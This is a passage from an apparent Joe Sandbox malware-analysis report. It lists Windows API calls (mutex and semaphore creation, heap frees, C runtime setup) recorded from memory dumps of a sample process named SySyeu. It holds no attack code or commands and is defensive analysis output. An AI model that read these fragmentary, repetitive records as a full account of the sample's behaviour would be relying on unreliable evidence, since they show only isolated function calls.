• API ID: CreateFromInitializeInstanceStringUninitialize
• String ID:
• API String ID: 2575628211-0
APIs
  • Part of subcall function 00E16598: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E1659F
• __set_app_type.MSVCRT ref: 00E15E92
• __p__fmode.MSVCRT ref: 00E15EA8
• __p__commode.MSVCRT ref: 00E15EB6
• __setusermatherr.MSVCRT ref: 00E15ED7
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
APIs
• GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040,?,00000000,00000000), ref: 00E14771
• CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001,?,?,?,?,?,00000000), ref: 00E147A5
  • Part of subcall function 00E146CA: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,00E12B21,00000000,?,?), ref: 00E146DA
  • Part of subcall function 00E146CA: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,00E12B21,00000000,?,?), ref: 00E146E9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
• API ID: ErrorLast$CreateCurrentMutexProcess
• String ID: Local\SM0:%d:%d:%hs
• API String ID: 779401067-4162240545
APIs
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00E12CC6
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E12CD2
Strings
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
• API ID: ErrorLastOpenSemaphore
• String ID: _p0
• API String ID: 1909229842-2437413317
APIs
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 00E14925
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00E14936
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00E1495D
• HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00E14964
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
• API ID: ErrorHeapLast$FreeProcess
• String ID:
• API String ID: 1234203156-0
APIs
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 00E14925
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00E14936
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00E1495D
• HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00E14964
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
• API ID: ErrorHeapLast$FreeProcess
• String ID:
• API String ID: 1234203156-0
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,?,00E14B2F,?,00000000,00000000,?,?,?,00000000,?), ref: 00E12E80
• HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?,?,?,00E148A0,?,?,?,?,00000000), ref: 00E12E87
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00E14B2F,?,00000000,00000000,?,?,?,00000000,?,?,?,00E148A0), ref: 00E12EA5
• HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00000000,?,?,?,00E148A0,?,?,?,?,00000000), ref: 00E12EAC
Memory Dump Source
• Source File: 00000007.00000002.4130740219.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000007.00000002.4130706138.0000000000E10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.4130773816.0000000000E19000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e10000_SySyeu.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0